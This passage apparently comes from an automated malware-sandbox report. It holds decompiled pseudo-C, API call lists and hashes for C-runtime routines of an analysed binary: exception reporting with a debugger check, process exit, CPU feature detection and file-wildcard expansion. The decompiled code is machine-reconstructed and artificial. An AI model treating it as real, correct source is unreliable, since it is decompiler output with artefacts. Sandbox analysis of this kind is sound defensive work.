                                                  • Part of subcall function 00C23663: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,00C1B9BE,?,?,?), ref: 00C23706
                                                  • Part of subcall function 00C23663: _free.LIBCMT ref: 00C236C5
                                                  • Part of subcall function 00C23663: _free.LIBCMT ref: 00C236FB
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C2D264
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C2D2AE
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C2D374
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale$ErrorLast_free
                                                • String ID:
                                                • API String ID: 3140898709-0
                                                • Opcode ID: 56197811006076d306faf9abba00e36efe8f01ae8522eb6ac335d608627689c8
                                                • Instruction ID: 77ffab7c776bca03a06f34495da7bb57603a492f9b71df0326de0b154c9bb954
                                                • Opcode Fuzzy Hash: 56197811006076d306faf9abba00e36efe8f01ae8522eb6ac335d608627689c8
                                                • Instruction Fuzzy Hash: FF61A4716101279FDB28EF24EC82BBA73B8EF64301F144179ED16C6991E778EA80DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00C1D7A2(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				char _v0;
                                                				signed int _v8;
                                                				intOrPtr _v524;
                                                				intOrPtr _v528;
                                                				void* _v532;
                                                				intOrPtr _v536;
                                                				char _v540;
                                                				intOrPtr _v544;
                                                				intOrPtr _v548;
                                                				intOrPtr _v552;
                                                				intOrPtr _v556;
                                                				intOrPtr _v560;
                                                				intOrPtr _v564;
                                                				intOrPtr _v568;
                                                				intOrPtr _v572;
                                                				intOrPtr _v576;
                                                				intOrPtr _v580;
                                                				intOrPtr _v584;
                                                				char _v724;
                                                				intOrPtr _v792;
                                                				intOrPtr _v800;
                                                				char _v804;
                                                				struct _EXCEPTION_POINTERS _v812;
                                                				void* __edi;
                                                				signed int _t40;
                                                				char* _t47;
                                                				char* _t49;
                                                				intOrPtr _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				int _t67;
                                                				intOrPtr _t68;
                                                				signed int _t69;
                                                
                                                				_t68 = __esi;
                                                				_t65 = __edx;
                                                				_t60 = __ebx;
                                                				_t40 =  *0xc42014; // 0x4fdfcf70
                                                				_t41 = _t40 ^ _t69;
                                                				_v8 = _t40 ^ _t69;
                                                				if(_a4 != 0xffffffff) {
                                                					_push(_a4);
                                                					E00C17CD0(_t41);
                                                					_pop(_t61);
                                                				}
                                                				E00C18BB0(_t66,  &_v804, 0, 0x50);
                                                				E00C18BB0(_t66,  &_v724, 0, 0x2cc);
                                                				_v812.ExceptionRecord =  &_v804;
                                                				_t47 =  &_v724;
                                                				_v812.ContextRecord = _t47;
                                                				_v548 = _t47;
                                                				_v552 = _t61;
                                                				_v556 = _t65;
                                                				_v560 = _t60;
                                                				_v564 = _t68;
                                                				_v568 = _t66;
                                                				_v524 = ss;
                                                				_v536 = cs;
                                                				_v572 = ds;
                                                				_v576 = es;
                                                				_v580 = fs;
                                                				_v584 = gs;
                                                				asm("pushfd");
                                                				_pop( *_t22);
                                                				_v540 = _v0;
                                                				_t49 =  &_v0;
                                                				_v528 = _t49;
                                                				_v724 = 0x10001;
                                                				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                				_v804 = _a8;
                                                				_v800 = _a12;
                                                				_v792 = _v0;
                                                				_t67 = IsDebuggerPresent();
                                                				SetUnhandledExceptionFilter(0);
                                                				if(UnhandledExceptionFilter( &_v812) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
                                                					_push(_a4);
                                                					_t57 = E00C17CD0(_t57);
                                                				}
                                                				return E00C17193(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
                                                			}





































                                                0x00c1d7a2
                                                0x00c1d7a2
                                                0x00c1d7a2
                                                0x00c1d7ad
                                                0x00c1d7b2
                                                0x00c1d7b4
                                                0x00c1d7bc
                                                0x00c1d7be
                                                0x00c1d7c1
                                                0x00c1d7c6
                                                0x00c1d7c6
                                                0x00c1d7d2
                                                0x00c1d7e5
                                                0x00c1d7f3
                                                0x00c1d7f9
                                                0x00c1d7ff
                                                0x00c1d805
                                                0x00c1d80b
                                                0x00c1d811
                                                0x00c1d817
                                                0x00c1d81d
                                                0x00c1d823
                                                0x00c1d829
                                                0x00c1d830
                                                0x00c1d837
                                                0x00c1d83e
                                                0x00c1d845
                                                0x00c1d84c
                                                0x00c1d853
                                                0x00c1d854
                                                0x00c1d85d
                                                0x00c1d863
                                                0x00c1d866
                                                0x00c1d86c
                                                0x00c1d879
                                                0x00c1d882
                                                0x00c1d88b
                                                0x00c1d894
                                                0x00c1d8a2
                                                0x00c1d8a4
                                                0x00c1d8b9
                                                0x00c1d8c5
                                                0x00c1d8c8
                                                0x00c1d8cd
                                                0x00c1d8da

                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 00C1D89A
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C1D8A4
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00C1D8B1
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 8e64b714276a289b7c9c8ad1aa8965350945e7a8af818f2da3957a8c1a7e4dd2
                                                • Instruction ID: 4f4da0879add98407bba948aa70b98714f1f91b84c927788302f9b73fd817aaf
                                                • Opcode Fuzzy Hash: 8e64b714276a289b7c9c8ad1aa8965350945e7a8af818f2da3957a8c1a7e4dd2
                                                • Instruction Fuzzy Hash: 2631C2749012289BCB21DF68DD89BDCBBB4BF08310F5041EAE41CA6290EB309B859F84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C20FDC(int _a4) {
                                                				void* _t14;
                                                
                                                				if(E00C2B3BA(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                					TerminateProcess(GetCurrentProcess(), _a4);
                                                				}
                                                				E00C21061(_t14, _a4);
                                                				ExitProcess(_a4);
                                                			}




                                                0x00c20fe9
                                                0x00c21005
                                                0x00c21005
                                                0x00c2100e
                                                0x00c21017

                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?,00C20FD8,?,?,?,?,?,00C1B9BE), ref: 00C20FFE
                                                • TerminateProcess.KERNEL32(00000000,?,00C20FD8,?,?,?,?,?,00C1B9BE), ref: 00C21005
                                                • ExitProcess.KERNEL32 ref: 00C21017
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 3afd4f99fa0e839260fbb4b91803e00c9f0e1cefa80bf54e91a6c9b977dab130
                                                • Instruction ID: 78fe96f124e77ac2ad31f90ffbc91044b984ad5f0bde1b7ff9245d87d47debdd
                                                • Opcode Fuzzy Hash: 3afd4f99fa0e839260fbb4b91803e00c9f0e1cefa80bf54e91a6c9b977dab130
                                                • Instruction Fuzzy Hash: 66E0B636110598AFCB2A6B54ED89B4D3B69EB50742B050414FA1986631DF39EDC2DB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E00C17D75(signed int __edx) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				intOrPtr _t60;
                                                				signed int _t61;
                                                				signed int _t62;
                                                				signed int _t63;
                                                				signed int _t66;
                                                				signed int _t67;
                                                				signed int _t73;
                                                				intOrPtr _t74;
                                                				intOrPtr _t75;
                                                				intOrPtr* _t77;
                                                				signed int _t78;
                                                				intOrPtr* _t82;
                                                				signed int _t85;
                                                				signed int _t90;
                                                				intOrPtr* _t93;
                                                				signed int _t96;
                                                				signed int _t99;
                                                				signed int _t104;
                                                
                                                				_t90 = __edx;
                                                				 *0xc990a4 =  *0xc990a4 & 0x00000000;
                                                				 *0xc42030 =  *0xc42030 | 0x00000001;
                                                				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                					L23:
                                                					return 0;
                                                				}
                                                				_v20 = _v20 & 0x00000000;
                                                				_push(_t74);
                                                				_t93 =  &_v40;
                                                				asm("cpuid");
                                                				_t75 = _t74;
                                                				 *_t93 = 0;
                                                				 *((intOrPtr*)(_t93 + 4)) = _t74;
                                                				 *((intOrPtr*)(_t93 + 8)) = 0;
                                                				 *(_t93 + 0xc) = _t90;
                                                				_v16 = _v40;
                                                				_v8 = _v28 ^ 0x49656e69;
                                                				_v12 = _v32 ^ 0x6c65746e;
                                                				_push(_t75);
                                                				asm("cpuid");
                                                				_t77 =  &_v40;
                                                				 *_t77 = 1;
                                                				 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                				 *((intOrPtr*)(_t77 + 8)) = 0;
                                                				 *(_t77 + 0xc) = _t90;
                                                				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
                                                					L9:
                                                					_t96 =  *0xc990a8; // 0x2
                                                					L10:
                                                					_t85 = _v32;
                                                					_t60 = 7;
                                                					_v8 = _t85;
                                                					if(_v16 < _t60) {
                                                						_t78 = _v20;
                                                					} else {
                                                						_push(_t77);
                                                						asm("cpuid");
                                                						_t82 =  &_v40;
                                                						 *_t82 = _t60;
                                                						 *((intOrPtr*)(_t82 + 4)) = _t77;
                                                						 *((intOrPtr*)(_t82 + 8)) = 0;
                                                						_t85 = _v8;
                                                						 *(_t82 + 0xc) = _t90;
                                                						_t78 = _v36;
                                                						if((_t78 & 0x00000200) != 0) {
                                                							 *0xc990a8 = _t96 | 0x00000002;
                                                						}
                                                					}
                                                					_t61 =  *0xc42030; // 0x6f
                                                					_t62 = _t61 | 0x00000002;
                                                					 *0xc990a4 = 1;
                                                					 *0xc42030 = _t62;
                                                					if((_t85 & 0x00100000) != 0) {
                                                						_t63 = _t62 | 0x00000004;
                                                						 *0xc990a4 = 2;
                                                						 *0xc42030 = _t63;
                                                						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
                                                							asm("xgetbv");
                                                							_v24 = _t63;
                                                							_v20 = _t90;
                                                							_t104 = 6;
                                                							if((_v24 & _t104) == _t104) {
                                                								_t66 =  *0xc42030; // 0x6f
                                                								_t67 = _t66 | 0x00000008;
                                                								 *0xc990a4 = 3;
                                                								 *0xc42030 = _t67;
                                                								if((_t78 & 0x00000020) != 0) {
                                                									 *0xc990a4 = 5;
                                                									 *0xc42030 = _t67 | 0x00000020;
                                                									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
                                                										 *0xc42030 =  *0xc42030 | 0x00000040;
                                                										 *0xc990a4 = _t104;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L23;
                                                				}
                                                				_t73 = _v40 & 0x0fff3ff0;
                                                				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
                                                					_t99 =  *0xc990a8; // 0x2
                                                					_t96 = _t99 | 0x00000001;
                                                					 *0xc990a8 = _t96;
                                                					goto L10;
                                                				} else {
                                                					goto L9;
                                                				}
                                                			}






























                                                0x00c17d75
                                                0x00c17d78
                                                0x00c17d82
                                                0x00c17d93
                                                0x00c17f45
                                                0x00c17f48
                                                0x00c17f48
                                                0x00c17d99
                                                0x00c17d9f
                                                0x00c17da4
                                                0x00c17da8
                                                0x00c17dac
                                                0x00c17dae
                                                0x00c17db0
                                                0x00c17db3
                                                0x00c17db8
                                                0x00c17dc1
                                                0x00c17dd2
                                                0x00c17ddd
                                                0x00c17de3
                                                0x00c17de4
                                                0x00c17dea
                                                0x00c17ded
                                                0x00c17df7
                                                0x00c17dfa
                                                0x00c17dfd
                                                0x00c17e00
                                                0x00c17e45
                                                0x00c17e45
                                                0x00c17e4b
                                                0x00c17e4b
                                                0x00c17e50
                                                0x00c17e51
                                                0x00c17e57
                                                0x00c17e89
                                                0x00c17e59
                                                0x00c17e5b
                                                0x00c17e5c
                                                0x00c17e62
                                                0x00c17e65
                                                0x00c17e67
                                                0x00c17e6a
                                                0x00c17e6d
                                                0x00c17e70
                                                0x00c17e73
                                                0x00c17e7c
                                                0x00c17e81
                                                0x00c17e81
                                                0x00c17e7c
                                                0x00c17e8c
                                                0x00c17e91
                                                0x00c17e94
                                                0x00c17e9e
                                                0x00c17ea9
                                                0x00c17eaf
                                                0x00c17eb2
                                                0x00c17ebc
                                                0x00c17ec7
                                                0x00c17ed3
                                                0x00c17ed6
                                                0x00c17ed9
                                                0x00c17ee4
                                                0x00c17ee9
                                                0x00c17eeb
                                                0x00c17ef0
                                                0x00c17ef3
                                                0x00c17efd
                                                0x00c17f05
                                                0x00c17f0a
                                                0x00c17f14
                                                0x00c17f22
                                                0x00c17f35
                                                0x00c17f3c
                                                0x00c17f3c
                                                0x00c17f22
                                                0x00c17f05
                                                0x00c17ee9
                                                0x00c17ec7
                                                0x00000000
                                                0x00c17f44
                                                0x00c17e05
                                                0x00c17e0f
                                                0x00c17e34
                                                0x00c17e3a
                                                0x00c17e3d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C17D8B
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-0
                                                • Opcode ID: f55daf5905fced4b0e65d0b04979ba260967c7dc463cc5aac39b87d7c1c2f1d8
                                                • Instruction ID: 855d98db07d355a37395bbd93bff8c370114ecba96bbf1418939ca50b030aa90
                                                • Opcode Fuzzy Hash: f55daf5905fced4b0e65d0b04979ba260967c7dc463cc5aac39b87d7c1c2f1d8
                                                • Instruction Fuzzy Hash: 57516E759162058FEB14CF58D88A7AEB7F0FB49310F2491AAD425EB350D3759E90CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00C2A284(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				union _FINDEX_INFO_LEVELS _v28;
                                                				intOrPtr* _v32;
                                                				intOrPtr _v36;
                                                				signed int _v48;
                                                				struct _WIN32_FIND_DATAW _v604;
                                                				char _v605;
                                                				intOrPtr* _v612;
                                                				union _FINDEX_INFO_LEVELS _v616;
                                                				union _FINDEX_INFO_LEVELS _v620;
                                                				union _FINDEX_INFO_LEVELS _v624;
                                                				signed int _v628;
                                                				union _FINDEX_INFO_LEVELS _v632;
                                                				union _FINDEX_INFO_LEVELS _v636;
                                                				signed int _v640;
                                                				signed int _v644;
                                                				union _FINDEX_INFO_LEVELS _v648;
                                                				union _FINDEX_INFO_LEVELS _v652;
                                                				union _FINDEX_INFO_LEVELS _v656;
                                                				union _FINDEX_INFO_LEVELS _v660;
                                                				signed int _v664;
                                                				union _FINDEX_INFO_LEVELS _v668;
                                                				union _FINDEX_INFO_LEVELS _v672;
                                                				void* __ebx;
                                                				void* __edi;
                                                				intOrPtr _t68;
                                                				signed int _t73;
                                                				signed int _t75;
                                                				char _t77;
                                                				signed char _t78;
                                                				signed int _t84;
                                                				signed int _t94;
                                                				signed int _t97;
                                                				union _FINDEX_INFO_LEVELS _t98;
                                                				union _FINDEX_INFO_LEVELS _t100;
                                                				intOrPtr* _t106;
                                                				signed int _t109;
                                                				intOrPtr _t116;
                                                				signed int _t118;
                                                				signed int _t121;
                                                				signed int _t123;
                                                				void* _t126;
                                                				union _FINDEX_INFO_LEVELS _t127;
                                                				void* _t128;
                                                				intOrPtr* _t130;
                                                				intOrPtr* _t133;
                                                				signed int _t135;
                                                				intOrPtr* _t138;
                                                				signed int _t143;
                                                				signed int _t149;
                                                				void* _t155;
                                                				signed int _t158;
                                                				intOrPtr _t160;
                                                				void* _t161;
                                                				void* _t165;
                                                				void* _t166;
                                                				signed int _t167;
                                                				signed int _t170;
                                                				void* _t171;
                                                				signed int _t172;
                                                				void* _t173;
                                                				void* _t174;
                                                
                                                				_push(__ecx);
                                                				_t133 = _a4;
                                                				_t2 = _t133 + 1; // 0x1
                                                				_t155 = _t2;
                                                				do {
                                                					_t68 =  *_t133;
                                                					_t133 = _t133 + 1;
                                                				} while (_t68 != 0);
                                                				_t158 = _a12;
                                                				_t135 = _t133 - _t155 + 1;
                                                				_v8 = _t135;
                                                				if(_t135 <=  !_t158) {
                                                					_push(__esi);
                                                					_t5 = _t158 + 1; // 0x1
                                                					_t126 = _t5 + _t135;
                                                					_t165 = E00C22F42(_t126, 1);
                                                					__eflags = _t158;
                                                					if(_t158 == 0) {
                                                						L7:
                                                						_push(_v8);
                                                						_t126 = _t126 - _t158;
                                                						_t73 = E00C30542(_t165 + _t158, _t126, _a4);
                                                						_t172 = _t171 + 0x10;
                                                						__eflags = _t73;
                                                						if(_t73 != 0) {
                                                							goto L12;
                                                						} else {
                                                							_t130 = _a16;
                                                							_t118 = E00C2A5C8(_t130);
                                                							_v8 = _t118;
                                                							__eflags = _t118;
                                                							if(_t118 == 0) {
                                                								 *( *(_t130 + 4)) = _t165;
                                                								_t167 = 0;
                                                								_t14 = _t130 + 4;
                                                								 *_t14 =  *(_t130 + 4) + 4;
                                                								__eflags =  *_t14;
                                                							} else {
                                                								E00C22F9F(_t165);
                                                								_t167 = _v8;
                                                							}
                                                							E00C22F9F(0);
                                                							_t121 = _t167;
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t158);
                                                						_t123 = E00C30542(_t165, _t126, _a8);
                                                						_t172 = _t171 + 0x10;
                                                						__eflags = _t123;
                                                						if(_t123 != 0) {
                                                							L12:
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							_push(0);
                                                							E00C1D97B();
                                                							asm("int3");
                                                							_t170 = _t172;
                                                							_t173 = _t172 - 0x298;
                                                							_t75 =  *0xc42014; // 0x4fdfcf70
                                                							_v48 = _t75 ^ _t170;
                                                							_t138 = _v32;
                                                							_t156 = _v28;
                                                							_push(_t126);
                                                							_push(0);
                                                							_t160 = _v36;
                                                							_v648 = _t156;
                                                							__eflags = _t138 - _t160;
                                                							if(_t138 != _t160) {
                                                								while(1) {
                                                									_t116 =  *_t138;
                                                									__eflags = _t116 - 0x2f;
                                                									if(_t116 == 0x2f) {
                                                										break;
                                                									}
                                                									__eflags = _t116 - 0x5c;
                                                									if(_t116 != 0x5c) {
                                                										__eflags = _t116 - 0x3a;
                                                										if(_t116 != 0x3a) {
                                                											_t138 = E00C31410(_t160, _t138);
                                                											__eflags = _t138 - _t160;
                                                											if(_t138 != _t160) {
                                                												continue;
                                                											}
                                                										}
                                                									}
                                                									break;
                                                								}
                                                								_t156 = _v612;
                                                							}
                                                							_t77 =  *_t138;
                                                							_v605 = _t77;
                                                							__eflags = _t77 - 0x3a;
                                                							if(_t77 != 0x3a) {
                                                								L23:
                                                								_t127 = 0;
                                                								__eflags = _t77 - 0x2f;
                                                								if(__eflags == 0) {
                                                									L26:
                                                									_t78 = 1;
                                                								} else {
                                                									__eflags = _t77 - 0x5c;
                                                									if(__eflags == 0) {
                                                										goto L26;
                                                									} else {
                                                										__eflags = _t77 - 0x3a;
                                                										_t78 = 0;
                                                										if(__eflags == 0) {
                                                											goto L26;
                                                										}
                                                									}
                                                								}
                                                								_v672 = _t127;
                                                								_v668 = _t127;
                                                								_push(_t165);
                                                								asm("sbb eax, eax");
                                                								_v664 = _t127;
                                                								_v660 = _t127;
                                                								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
                                                								_v656 = _t127;
                                                								_v652 = _t127;
                                                								_t84 = E00C204AD(_t138 - _t160 + 1, _t160,  &_v672, E00C29DEA(_t156, __eflags));
                                                								_t174 = _t173 + 0xc;
                                                								asm("sbb eax, eax");
                                                								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
                                                								__eflags = _t166 - 0xffffffff;
                                                								if(_t166 != 0xffffffff) {
                                                									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
                                                									__eflags = _t143;
                                                									_t144 = _t143 >> 2;
                                                									_v644 = _t143 >> 2;
                                                									do {
                                                										_v636 = _t127;
                                                										_v632 = _t127;
                                                										_v628 = _t127;
                                                										_v624 = _t127;
                                                										_v620 = _t127;
                                                										_v616 = _t127;
                                                										_t94 = E00C29FC6( &(_v604.cFileName),  &_v636,  &_v605, E00C29DEA(_t156, __eflags));
                                                										_t174 = _t174 + 0x10;
                                                										asm("sbb eax, eax");
                                                										_t97 =  !( ~_t94) & _v628;
                                                										__eflags =  *_t97 - 0x2e;
                                                										if( *_t97 != 0x2e) {
                                                											L34:
                                                											_push(_v612);
                                                											_t98 = E00C2A284(_t144, _t166, _t97, _t160, _v640);
                                                											_t174 = _t174 + 0x10;
                                                											_v648 = _t98;
                                                											__eflags = _t98;
                                                											if(_t98 != 0) {
                                                												__eflags = _v616 - _t127;
                                                												if(_v616 != _t127) {
                                                													E00C22F9F(_v628);
                                                													_t98 = _v648;
                                                												}
                                                												_t127 = _t98;
                                                											} else {
                                                												goto L35;
                                                											}
                                                										} else {
                                                											_t144 =  *((intOrPtr*)(_t97 + 1));
                                                											__eflags = _t144;
                                                											if(_t144 == 0) {
                                                												goto L35;
                                                											} else {
                                                												__eflags = _t144 - 0x2e;
                                                												if(_t144 != 0x2e) {
                                                													goto L34;
                                                												} else {
                                                													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
                                                													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
                                                														goto L35;
                                                													} else {
                                                														goto L34;
                                                													}
                                                												}
                                                											}
                                                										}
                                                										L43:
                                                										FindClose(_t166);
                                                										goto L44;
                                                										L35:
                                                										__eflags = _v616 - _t127;
                                                										if(_v616 != _t127) {
                                                											E00C22F9F(_v628);
                                                											_pop(_t144);
                                                										}
                                                										__eflags = FindNextFileW(_t166,  &_v604);
                                                									} while (__eflags != 0);
                                                									_t106 = _v612;
                                                									_t149 = _v644;
                                                									_t156 =  *_t106;
                                                									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
                                                									__eflags = _t149 - _t109;
                                                									if(_t149 != _t109) {
                                                										E00C30EE0(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E00C29FAE);
                                                									}
                                                									goto L43;
                                                								} else {
                                                									_push(_v612);
                                                									_t127 = E00C2A284( &_v604, _t166, _t160, _t127, _t127);
                                                								}
                                                								L44:
                                                								__eflags = _v652;
                                                								_pop(_t165);
                                                								if(_v652 != 0) {
                                                									E00C22F9F(_v664);
                                                								}
                                                								_t100 = _t127;
                                                							} else {
                                                								__eflags = _t138 - _t160 + 1;
                                                								if(_t138 == _t160 + 1) {
                                                									_t77 = _v605;
                                                									goto L23;
                                                								} else {
                                                									_push(_t156);
                                                									_t100 = E00C2A284(_t138, _t165, _t160, 0, 0);
                                                								}
                                                							}
                                                							_pop(_t161);
                                                							__eflags = _v12 ^ _t170;
                                                							_pop(_t128);
                                                							return E00C17193(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
                                                						} else {
                                                							goto L7;
                                                						}
                                                					}
                                                				} else {
                                                					_t121 = 0xc;
                                                					L4:
                                                					return _t121;
                                                				}
                                                			}


































































                                                0x00c2a289
                                                0x00c2a28a
                                                0x00c2a28d
                                                0x00c2a28d
                                                0x00c2a290
                                                0x00c2a290
                                                0x00c2a292
                                                0x00c2a293
                                                0x00c2a298
                                                0x00c2a29f
                                                0x00c2a2a2
                                                0x00c2a2a7
                                                0x00c2a2b0
                                                0x00c2a2b1
                                                0x00c2a2b4
                                                0x00c2a2be
                                                0x00c2a2c2
                                                0x00c2a2c4
                                                0x00c2a2d8
                                                0x00c2a2d8
                                                0x00c2a2db
                                                0x00c2a2e5
                                                0x00c2a2ea
                                                0x00c2a2ed
                                                0x00c2a2ef
                                                0x00000000
                                                0x00c2a2f1
                                                0x00c2a2f1
                                                0x00c2a2f6
                                                0x00c2a2fd
                                                0x00c2a300
                                                0x00c2a302
                                                0x00c2a313
                                                0x00c2a315
                                                0x00c2a317
                                                0x00c2a317
                                                0x00c2a317
                                                0x00c2a304
                                                0x00c2a305
                                                0x00c2a30a
                                                0x00c2a30d
                                                0x00c2a31c
                                                0x00c2a322
                                                0x00000000
                                                0x00c2a325
                                                0x00c2a2c6
                                                0x00c2a2c6
                                                0x00c2a2cc
                                                0x00c2a2d1
                                                0x00c2a2d4
                                                0x00c2a2d6
                                                0x00c2a328
                                                0x00c2a32a
                                                0x00c2a32b
                                                0x00c2a32c
                                                0x00c2a32d
                                                0x00c2a32e
                                                0x00c2a32f
                                                0x00c2a334
                                                0x00c2a338
                                                0x00c2a33a
                                                0x00c2a340
                                                0x00c2a347
                                                0x00c2a34a
                                                0x00c2a34d
                                                0x00c2a350
                                                0x00c2a351
                                                0x00c2a352
                                                0x00c2a355
                                                0x00c2a35b
                                                0x00c2a35d
                                                0x00c2a35f
                                                0x00c2a35f
                                                0x00c2a361
                                                0x00c2a363
                                                0x00000000
                                                0x00000000
                                                0x00c2a365
                                                0x00c2a367
                                                0x00c2a369
                                                0x00c2a36b
                                                0x00c2a376
                                                0x00c2a378
                                                0x00c2a37a
                                                0x00000000
                                                0x00000000
                                                0x00c2a37a
                                                0x00c2a36b
                                                0x00000000
                                                0x00c2a367
                                                0x00c2a37c
                                                0x00c2a37c
                                                0x00c2a382
                                                0x00c2a384
                                                0x00c2a38a
                                                0x00c2a38c
                                                0x00c2a3ae
                                                0x00c2a3ae
                                                0x00c2a3b0
                                                0x00c2a3b2
                                                0x00c2a3be
                                                0x00c2a3be
                                                0x00c2a3b4
